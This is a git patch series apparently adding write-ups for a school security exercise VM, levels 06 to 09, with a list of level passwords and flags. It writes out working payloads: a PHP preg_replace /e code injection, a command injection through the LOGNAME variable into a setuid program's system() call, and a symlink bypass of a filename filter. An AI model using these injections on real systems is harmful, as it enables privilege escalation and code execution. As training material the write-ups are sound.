From db531a6c75ce8dfd67ff0d3991341379092bfa57 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:47:23 +0100 Subject: [PATCH 01/28] Update README.mdx --- level00/README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/level00/README.mdx b/level00/README.mdx index eb26ee1..aef75a0 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -1,3 +1,5 @@ +Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) + # SSH ```b From ca425d2300526e000284cc18de4eeac52d830442 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 08:47:39 +0000 Subject: [PATCH 02/28] show READMEs daily --- README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.mdx b/README.mdx index d166c57..71e5831 100644 --- a/README.mdx +++ b/README.mdx @@ -18,6 +18,8 @@ flag02 ft_waNDReL0L +Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) + # SSH ```b From bf256437e80ab8282df95baa87ca2dce60d1adac Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:47:48 +0100 Subject: [PATCH 03/28] Update README.mdx --- level00/README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/level00/README.mdx b/level00/README.mdx index aef75a0..9bfaee3 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -1,4 +1,4 @@ -Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) +Subject [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) # SSH From c78c7d07501c25f9bd2d95077024990d30f64b70 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 08:48:02 +0000 Subject: [PATCH 04/28] show READMEs daily --- README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index 71e5831..11f505a 100644 --- a/README.mdx +++ b/README.mdx @@ -18,7 +18,7 @@ flag02 ft_waNDReL0L -Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) +Subject [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) # SSH From 61884db71995d1b3c6939c6dcf0dd95873155e82 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:04:52 +0100 Subject: [PATCH 05/28] Update README.mdx --- level06/README.mdx | 47 ++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 43 insertions(+), 4 deletions(-) diff --git a/level06/README.mdx b/level06/README.mdx index c57f660..8fb661c 100644 --- a/level06/README.mdx +++ b/level06/README.mdx @@ -31,7 +31,6 @@ function y($m) { $m = preg_replace("/@/", " y", $m); return $m; } - function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); @@ -39,10 +38,50 @@ function x($y, $z) { $a = preg_replace("/\]/", ")", $a); return $a; } +$r = x($argv[1], $argv[2]); +print $r; +?> +``` -$r = x($argv[1], $argv[2]); print $r; +Inspect `y` function -?> +```b +function y($m) { + $m = preg_replace("/\./", " x ", $m); + $m = preg_replace("/@/", " y", $m); + return $m; +} +``` + +Notes - function y filters m twice +1. `" x "` replaces all regex `/./` +2. `" y"` replaces all regex `/@/` + +Inspect `x` function + +```b +function x($y, $z) { + $a = file_get_contents($y); + $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); + $a = preg_replace("/\[/", "(", $a); + $a = preg_replace("/\]/", ")", $a); + return $a; +} ``` -🟡 notes in `sea` +Notes - function x filters `argv[1]` +1. `"/(\[x (.*)\])/e"` + - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` + - `/e` will eval the `y(\"\\2\")` as PHP code + - :yellow_circle: `/e` modifier only evaluates the replacement string we provide + - :yellow_circle: `/e` is deprecated long ago +2. `(` and `)` replace all `[` and `]` in the result respectively +- the func disregards argv[2] + +Solution +- figure one way + - ```[x ${`getflag`}]``` + - `${`getflag`}` captured + - ````getflag```` the backticks = doing `shell_exec()` + - `${ret}` + From 27311e0ab679432fcbcfdaa5c47e1c649779eb6c Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 10:05:09 +0000 Subject: [PATCH 06/28] show READMEs daily --- README.mdx | 47 +++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 43 insertions(+), 4 deletions(-) diff --git a/README.mdx b/README.mdx index 11f505a..c0bf0b4 100644 --- a/README.mdx +++ b/README.mdx @@ -482,7 +482,6 @@ function y($m) { $m = preg_replace("/@/", " y", $m); return $m; } - function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); @@ -490,13 +489,53 @@ function x($y, $z) { $a = preg_replace("/\]/", ")", $a); return $a; } +$r = x($argv[1], $argv[2]); +print $r; +?> +``` -$r = x($argv[1], $argv[2]); print $r; +Inspect `y` function -?> +```b +function y($m) { + $m = preg_replace("/\./", " x ", $m); + $m = preg_replace("/@/", " y", $m); + return $m; +} ``` -🟡 notes in `sea` +Notes - function y filters m twice +1. `" x "` replaces all regex `/./` +2. `" y"` replaces all regex `/@/` + +Inspect `x` function + +```b +function x($y, $z) { + $a = file_get_contents($y); + $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); + $a = preg_replace("/\[/", "(", $a); + $a = preg_replace("/\]/", ")", $a); + return $a; +} +``` + +Notes - function x filters `argv[1]` +1. `"/(\[x (.*)\])/e"` + - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` + - `/e` will eval the `y(\"\\2\")` as PHP code + - :yellow_circle: `/e` modifier only evaluates the replacement string we provide + - :yellow_circle: `/e` is deprecated long ago +2. `(` and `)` replace all `[` and `]` in the result respectively +- the func disregards argv[2] + +Solution +- figure one way + - ```[x ${`getflag`}]``` + - `${`getflag`}` captured + - ````getflag```` the backticks = doing `shell_exec()` + - `${ret}` + # 07 - Todo From af808391298ec3d635911fbb6852606739a5bee0 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:34:40 +0100 Subject: [PATCH 07/28] 6/done --- level06/README.mdx | 32 ++++++++++++++++++++++++-------- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/level06/README.mdx b/level06/README.mdx index 8fb661c..7d9d00d 100644 --- a/level06/README.mdx +++ b/level06/README.mdx @@ -5,9 +5,14 @@ Login ```b > ssh level06@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: viuaaale9huek52boumoomioc +> ls -l +-rwsr-x---+ 1 flag06 level06 7503 level06 +-rwxr-x--- 1 flag06 level06 356 level06.php ``` -Inspect (there are 2 files) +There are 2 files. + +Inspect: ```b > file level06 @@ -53,7 +58,7 @@ function y($m) { } ``` -Notes - function y filters m twice +Function `y` filters m twice 1. `" x "` replaces all regex `/./` 2. `" y"` replaces all regex `/@/` @@ -69,7 +74,7 @@ function x($y, $z) { } ``` -Notes - function x filters `argv[1]` +Function `x` filters `argv[1]` 1. `"/(\[x (.*)\])/e"` - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` - `/e` will eval the `y(\"\\2\")` as PHP code @@ -78,10 +83,21 @@ Notes - function x filters `argv[1]` 2. `(` and `)` replace all `[` and `]` in the result respectively - the func disregards argv[2] +Our goal +- `file_get_contents($argv[1])` depends on ___content___ of the file +- so `argv[1]` to a FILE +- it should be oneline in form of `[x `_cap_`]` + Solution -- figure one way - - ```[x ${`getflag`}]``` - - `${`getflag`}` captured - - ````getflag```` the backticks = doing `shell_exec()` - - `${ret}` +```b +# get the _token/flag_ in there to be captured and printed out + # shell_exec() system() exec() or simply backticks +# `getflag` called +# ${`getflag`} - get the ret +# [x ${`getflag`}] - framed in this form +# echo $(oneliner) > /tmp/temp - push it to a FILE + +> echo '[x ${`getflag`}]' > /tmp/temp +> ./level06 /tmp/temp +``` From 1583f40d13eb63b2c42befffadf9537b92ae117d Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 10:34:55 +0000 Subject: [PATCH 08/28] show READMEs daily --- README.mdx | 32 ++++++++++++++++++++++++-------- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/README.mdx b/README.mdx index c0bf0b4..71529c5 100644 --- a/README.mdx +++ b/README.mdx @@ -456,9 +456,14 @@ Login ```b > ssh level06@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: viuaaale9huek52boumoomioc +> ls -l +-rwsr-x---+ 1 flag06 level06 7503 level06 +-rwxr-x--- 1 flag06 level06 356 level06.php ``` -Inspect (there are 2 files) +There are 2 files. + +Inspect: ```b > file level06 @@ -504,7 +509,7 @@ function y($m) { } ``` -Notes - function y filters m twice +Function `y` filters m twice 1. `" x "` replaces all regex `/./` 2. `" y"` replaces all regex `/@/` @@ -520,7 +525,7 @@ function x($y, $z) { } ``` -Notes - function x filters `argv[1]` +Function `x` filters `argv[1]` 1. `"/(\[x (.*)\])/e"` - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` - `/e` will eval the `y(\"\\2\")` as PHP code @@ -529,13 +534,24 @@ Notes - function x filters `argv[1]` 2. `(` and `)` replace all `[` and `]` in the result respectively - the func disregards argv[2] +Our goal +- `file_get_contents($argv[1])` depends on ___content___ of the file +- so `argv[1]` to a FILE +- it should be oneline in form of `[x `_cap_`]` + Solution -- figure one way - - ```[x ${`getflag`}]``` - - `${`getflag`}` captured - - ````getflag```` the backticks = doing `shell_exec()` - - `${ret}` +```b +# get the _token/flag_ in there to be captured and printed out + # shell_exec() system() exec() or simply backticks +# `getflag` called +# ${`getflag`} - get the ret +# [x ${`getflag`}] - framed in this form +# echo $(oneliner) > /tmp/temp - push it to a FILE + +> echo '[x ${`getflag`}]' > /tmp/temp +> ./level06 /tmp/temp +``` # 07 - Todo From 1bbc312011e90551c0433bdecbf1a566733841b4 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:41:51 +0100 Subject: [PATCH 09/28] Create not_for_use.sh --- level06/not_for_use.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 level06/not_for_use.sh diff --git a/level06/not_for_use.sh b/level06/not_for_use.sh new file mode 100644 index 0000000..c85f31f --- /dev/null +++ b/level06/not_for_use.sh @@ -0,0 +1,3 @@ +rm -rf /tmp/temp +echo '[x ${`getflag`}]' > /tmp/tmp +./level06 /tmp/tmp From 41a7d3c9f47c8397046c0a65cec2fa1e2b5092e1 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:13:50 +0100 Subject: [PATCH 10/28] 7/done --- level07/README.mdx | 73 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 72 insertions(+), 1 deletion(-) diff --git a/level07/README.mdx b/level07/README.mdx index 7687a39..b29ccb5 100644 --- a/level07/README.mdx +++ b/level07/README.mdx @@ -1 +1,72 @@ -# 07 - Todo +# 07 + +Login + +```b +> ssh level07@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: wiok45aaoguiboiki2tuin6ub +> ls -l +-rwsr-sr-x 1 flag07 level07 8805 level07 +``` + +First thought: + - options: (not running it, just to see what it _prints_) + +```b +> file level07 +> strings level07 +> xxd level07 | grep level +> xxd level07 | grep -A3 -B3 level +> readelf -s ./level07 | grep -E 'getenv|system|exec|echo|puts|write|printf' +> objdump -d level07 | grep -E "getenv|system|exec|echo|puts|write|printf" + regex ^^ +``` + +Using `readelf -p .rodata` and `ltrace` +- `-p` : `string-dump` displays contents of a section as printable str +- `.rodata` : `read-only data` section = what we want to see + +```b +> readelf -p .rodata ./level07 +String dump of section '.rodata': + [ 8] LOGNAME + ^^^^^^^ 🟡 + [ 10] /bin/echo %s +``` +```b +> ltrace ./level07 + +__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 +getegid() = 2007 +geteuid() = 2007 +setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +getenv("LOGNAME") = "level07" + ^^^^^^^ 🟡 +asprintf(0xbffff744, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 18 +system("/bin/echo level07 "level07 + +--- SIGCHLD (Child exited) --- +<... system resumed> ) = 0 ++++ exited (status 0) +++ +``` + +Run it and we found that it prints `LOGNAME` + +```b +> ./level07 whoami +level07 +> man env +> env logname +level06 +> export LOGNAME='`id`' +> ./level07 +uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07) +``` + +Solution +```b +> export LOGNAME='`getflag`' +> ./level07 + + From 961760512501ee002227e45cf1037d64f42e750e Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:14:07 +0000 Subject: [PATCH 11/28] show READMEs daily --- README.mdx | 73 +++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 72 insertions(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index 71529c5..aac5662 100644 --- a/README.mdx +++ b/README.mdx @@ -554,5 +554,76 @@ Solution ``` -# 07 - Todo +# 07 + +Login + +```b +> ssh level07@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: wiok45aaoguiboiki2tuin6ub +> ls -l +-rwsr-sr-x 1 flag07 level07 8805 level07 +``` + +First thought: + - options: (not running it, just to see what it _prints_) + +```b +> file level07 +> strings level07 +> xxd level07 | grep level +> xxd level07 | grep -A3 -B3 level +> readelf -s ./level07 | grep -E 'getenv|system|exec|echo|puts|write|printf' +> objdump -d level07 | grep -E "getenv|system|exec|echo|puts|write|printf" + regex ^^ +``` + +Using `readelf -p .rodata` and `ltrace` +- `-p` : `string-dump` displays contents of a section as printable str +- `.rodata` : `read-only data` section = what we want to see + +```b +> readelf -p .rodata ./level07 +String dump of section '.rodata': + [ 8] LOGNAME + ^^^^^^^ 🟡 + [ 10] /bin/echo %s +``` +```b +> ltrace ./level07 + +__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 +getegid() = 2007 +geteuid() = 2007 +setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +getenv("LOGNAME") = "level07" + ^^^^^^^ 🟡 +asprintf(0xbffff744, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 18 +system("/bin/echo level07 "level07 + +--- SIGCHLD (Child exited) --- +<... system resumed> ) = 0 ++++ exited (status 0) +++ +``` + +Run it and we found that it prints `LOGNAME` + +```b +> ./level07 whoami +level07 +> man env +> env logname +level06 +> export LOGNAME='`id`' +> ./level07 +uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07) +``` + +Solution +```b +> export LOGNAME='`getflag`' +> ./level07 + + From e19370a78f5a5feb69921110927d69c0255d5b5b Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:15:27 +0100 Subject: [PATCH 12/28] Update README.mdx --- level07/README.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/level07/README.mdx b/level07/README.mdx index b29ccb5..7b76794 100644 --- a/level07/README.mdx +++ b/level07/README.mdx @@ -68,5 +68,4 @@ Solution ```b > export LOGNAME='`getflag`' > ./level07 - - +``` From 320a291327c6f88fde74abd95cca0949a6069a7f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:15:45 +0000 Subject: [PATCH 13/28] show READMEs daily --- README.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.mdx b/README.mdx index aac5662..5a34903 100644 --- a/README.mdx +++ b/README.mdx @@ -624,6 +624,5 @@ Solution ```b > export LOGNAME='`getflag`' > ./level07 - - +``` From f61372061f4b59cce2e18c29354564341319d3f9 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:30:54 +0100 Subject: [PATCH 14/28] Create README.mdx --- level08/README.mdx | 65 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 level08/README.mdx diff --git a/level08/README.mdx b/level08/README.mdx new file mode 100644 index 0000000..f94c54b --- /dev/null +++ b/level08/README.mdx @@ -0,0 +1,65 @@ +# 08 + +Login + +```b +> ssh level08@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: fiumuikeil55xe9cu4dood66h +> ls -l +-rwsr-s---+ 1 flag08 level08 8617 level08 +-rw------- 1 flag08 flag08 26 token +``` + +2 files: + +```b +> cat token +cat: token: Permission denied + +> ./level08 +./level08 [file to read] +``` + +Tryout + +```b +# run it + +> echo "a" > /tmp/tmp && ./level08 /tmp/tmp +a +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB + +# ltrace + +> ltrace ./level08 /tmp +__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 +strstr("/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp", 0, 014435162522) = -1 +err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied + ++++ exited (status 1) +++ + +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "aB\n", 1024) = 3 +write(1, "aB\n", 3aB +) = 3 ++++ exited (status 3) +++ +``` + +Observation: +- it reads the contents of a file +- as long as the filename contains no "token" as substr +- renaming `./token` is not allowed +- but we can make a symlink of it + - syntax: `ln -s real_path_src real_path_symlink` + +Solution +```b +> ln -s `realpath token` /tmp/tok +``` From 644ccc2af3df5020b97b180330a737e152c0a425 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:31:10 +0000 Subject: [PATCH 15/28] show READMEs daily --- README.mdx | 67 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 67 insertions(+) diff --git a/README.mdx b/README.mdx index 5a34903..1ea0375 100644 --- a/README.mdx +++ b/README.mdx @@ -626,3 +626,70 @@ Solution > ./level07 ``` + +# 08 + +Login + +```b +> ssh level08@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: fiumuikeil55xe9cu4dood66h +> ls -l +-rwsr-s---+ 1 flag08 level08 8617 level08 +-rw------- 1 flag08 flag08 26 token +``` + +2 files: + +```b +> cat token +cat: token: Permission denied + +> ./level08 +./level08 [file to read] +``` + +Tryout + +```b +# run it + +> echo "a" > /tmp/tmp && ./level08 /tmp/tmp +a +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB + +# ltrace + +> ltrace ./level08 /tmp +__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 +strstr("/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp", 0, 014435162522) = -1 +err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied + ++++ exited (status 1) +++ + +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "aB\n", 1024) = 3 +write(1, "aB\n", 3aB +) = 3 ++++ exited (status 3) +++ +``` + +Observation: +- it reads the contents of a file +- as long as the filename contains no "token" as substr +- renaming `./token` is not allowed +- but we can make a symlink of it + - syntax: `ln -s real_path_src real_path_symlink` + +Solution +```b +> ln -s `realpath token` /tmp/tok +``` + From 616d8a449ca49460da31bd7f104dd73ab67b9dac Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:33:18 +0100 Subject: [PATCH 16/28] Update README.mdx --- level08/README.mdx | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/level08/README.mdx b/level08/README.mdx index f94c54b..65955b6 100644 --- a/level08/README.mdx +++ b/level08/README.mdx @@ -53,13 +53,15 @@ write(1, "aB\n", 3aB ``` Observation: -- it reads the contents of a file -- as long as the filename contains no "token" as substr + +- it reads file contents, as long as the filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` Solution + ```b -> ln -s `realpath token` /tmp/tok +> ln -s `realpath token` /tmp/totem +> ./level08 /tmp/totem ``` From 1af132d697c3ac6f8868c38749c50d2f4eda2f68 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:33:35 +0000 Subject: [PATCH 17/28] show READMEs daily --- README.mdx | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.mdx b/README.mdx index 1ea0375..79ecc66 100644 --- a/README.mdx +++ b/README.mdx @@ -682,14 +682,16 @@ write(1, "aB\n", 3aB ``` Observation: -- it reads the contents of a file -- as long as the filename contains no "token" as substr + +- it reads file contents, as long as the filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` Solution + ```b -> ln -s `realpath token` /tmp/tok +> ln -s `realpath token` /tmp/totem +> ./level08 /tmp/totem ``` From e01c582ab01b37c48b6d1b41ce796b112f3ab5a0 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:40:10 +0100 Subject: [PATCH 18/28] Update README.mdx --- level08/README.mdx | 37 ++++++++++++++++++------------------- 1 file changed, 18 insertions(+), 19 deletions(-) diff --git a/level08/README.mdx b/level08/README.mdx index 65955b6..e239501 100644 --- a/level08/README.mdx +++ b/level08/README.mdx @@ -23,38 +23,37 @@ cat: token: Permission denied Tryout ```b -# run it - > echo "a" > /tmp/tmp && ./level08 /tmp/tmp a -> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp -aB -# ltrace +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ +``` -> ltrace ./level08 /tmp -__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 -strstr("/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 -open("/tmp", 0, 014435162522) = -1 -err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied - -+++ exited (status 1) +++ +```b +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB > ltrace ./level08 /tmp/tmp __libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 strstr("/tmp/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 open("/tmp/tmp", 0, 014435162522) = 3 -read(3, "aB\n", 1024) = 3 -write(1, "aB\n", 3aB -) = 3 -+++ exited (status 3) +++ +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ ``` Observation: -- it reads file contents, as long as the filename contains no substr "token" +- only the filename matters +- `./level` will cat the file, as long as filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` From 11dfeae19f89215fa8c52dbe0e6ad8605fe3337e Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:40:26 +0000 Subject: [PATCH 19/28] show READMEs daily --- README.mdx | 37 ++++++++++++++++++------------------- 1 file changed, 18 insertions(+), 19 deletions(-) diff --git a/README.mdx b/README.mdx index 79ecc66..2a60c52 100644 --- a/README.mdx +++ b/README.mdx @@ -652,38 +652,37 @@ cat: token: Permission denied Tryout ```b -# run it - > echo "a" > /tmp/tmp && ./level08 /tmp/tmp a -> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp -aB -# ltrace +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ +``` -> ltrace ./level08 /tmp -__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 -strstr("/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 -open("/tmp", 0, 014435162522) = -1 -err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied - -+++ exited (status 1) +++ +```b +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB > ltrace ./level08 /tmp/tmp __libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 strstr("/tmp/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 open("/tmp/tmp", 0, 014435162522) = 3 -read(3, "aB\n", 1024) = 3 -write(1, "aB\n", 3aB -) = 3 -+++ exited (status 3) +++ +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ ``` Observation: -- it reads file contents, as long as the filename contains no substr "token" +- only the filename matters +- `./level` will cat the file, as long as filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` From da083e02802a183933b01a553579c13a2d21573c Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:42:54 +0100 Subject: [PATCH 20/28] Update tokens.mdx --- tokens.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/tokens.mdx b/tokens.mdx index cc3ec12..55c1de9 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -9,6 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h +level09 quif5eloekouj29ke0vouxean (end of mandatory) flag00 nottoohardhere flag01 abcdefg From 581115a3d065b9d09534edee16ca4aa8ae68b316 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:43:05 +0100 Subject: [PATCH 21/28] Update tokens.mdx --- tokens.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index 55c1de9..c61dcdb 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -9,7 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean (end of mandatory) +level09 quif5eloekouj29ke0vouxean flag00 nottoohardhere flag01 abcdefg From 411be64b93fedde36021f428d14da5d0b91c266f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:43:19 +0000 Subject: [PATCH 22/28] show READMEs daily --- README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/README.mdx b/README.mdx index 2a60c52..db8b24e 100644 --- a/README.mdx +++ b/README.mdx @@ -9,6 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h +level09 quif5eloekouj29ke0vouxean flag00 nottoohardhere flag01 abcdefg From c801d98cc1be6584a4830a80b71bf78ba217c984 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:47:03 +0100 Subject: [PATCH 23/28] Update tokens.mdx --- tokens.mdx | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index c61dcdb..70822b1 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -9,9 +9,10 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean +level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L +flag08 quif5eloekouj29ke0vouxean ``` From 54f7ee166dbd0201814458664335d511f1acb21d Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:47:21 +0000 Subject: [PATCH 24/28] show READMEs daily --- README.mdx | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index db8b24e..5023334 100644 --- a/README.mdx +++ b/README.mdx @@ 